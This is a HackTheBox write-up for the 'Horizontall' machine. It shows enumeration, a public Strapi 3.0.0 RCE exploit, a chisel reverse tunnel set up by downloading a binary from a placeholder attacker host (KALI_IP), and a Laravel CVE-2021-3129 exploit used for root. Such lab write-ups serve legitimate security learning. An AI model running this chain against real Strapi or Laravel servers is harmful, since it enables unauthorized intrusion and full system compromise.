Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

Horizontall (HTB – Easy)

The machine exposes a simple website on port 80 that hides an API subdomain used by a Strapi CMS instance. An unauthenticated RCE in Strapi 3.0.0 provides a foothold. Privilege escalation is achieved by port‑forwarding an internal Laravel service and exploiting CVE‑2021‑3129.

Overview

Target: horizontall.htb (10.129.62.173)
Initial vector: Strapi 3.0.0 unauthenticated RCE
Privilege escalation: Laravel 8 CVE‑2021‑3129 via internal port 8000

Enumeration

Nmap:

22/tcp open  ssh
80/tcp open  http (nginx 1.14.0)

Port 80 redirects to http://horizontall.htb. The main page looks static and directory fuzzing with wfuzz does not reveal anything useful.

Inspecting the page source and JavaScript files and searching for http:// reveals: 

http://api-prod.horizontall.htb/reviews

Add api-prod.horizontall.htb to /etc/hosts and browse it. Fuzzing discovers: 

/admin
/admin/init

/admin/init identifies the backend as Strapi: 

$ curl http://api-prod.horizontall.htb/admin/init
-> Strapi 3.0.0

Foothold – Strapi 3.0.0 RCE

Searchsploit shows an unauthenticated RCE exploit for Strapi 3.0.0. Download it: 

$ searchsploit strapi 3.0.0
$ searchsploit -m <exploit>

Run the Python exploit against api-prod.horizontall.htb to obtain a shell as the strapi user.

From there, enumerate the filesystem: 

$ cat /etc/passwd
-> strapi home: /opt/strapi
$ cd /home
-> user.txt

Privilege Escalation – Internal Laravel

Check listening ports: 

$ netstat -nat
-> 1337, 8000 (localhost only)

Curling port 8000 locally: 

$ curl http://localhost:8000
-> Laravel v8

To reach it from the attacker machine, use chisel for reverse port forwarding.

Port Forwarding with Chisel

On attacker:

$ ./chisel server --reverse -p 1234

On victim:

$ wget http://KALI_IP/chisel
$ chmod +x chisel
$ ./chisel client KALI_IP:1234 R:8000:localhost:8000

Now http://127.0.0.1:8000 on the attacker shows the Laravel app.

Laravel CVE‑2021‑3129

Laravel 8 is vulnerable to CVE‑2021‑3129 (Ignition debug RCE) in certain configurations. Use a public exploit (e.g. CVE-2021-3129_exploit) against the forwarded port: 

$ python3 CVE-2021-3129_exploit.py http://127.0.0.1:8000

The exploit yields a shell as root inside the container/host running Laravel. From there, read /root/root.txt.

Conclusion

Horizontall chains hidden subdomain discovery, Strapi 3.0.0 unauthenticated RCE, and an internal Laravel 8 instance vulnerable to CVE‑2021‑3129. By pivoting through chisel to the internal service and exploiting Laravel, full system compromise is achieved.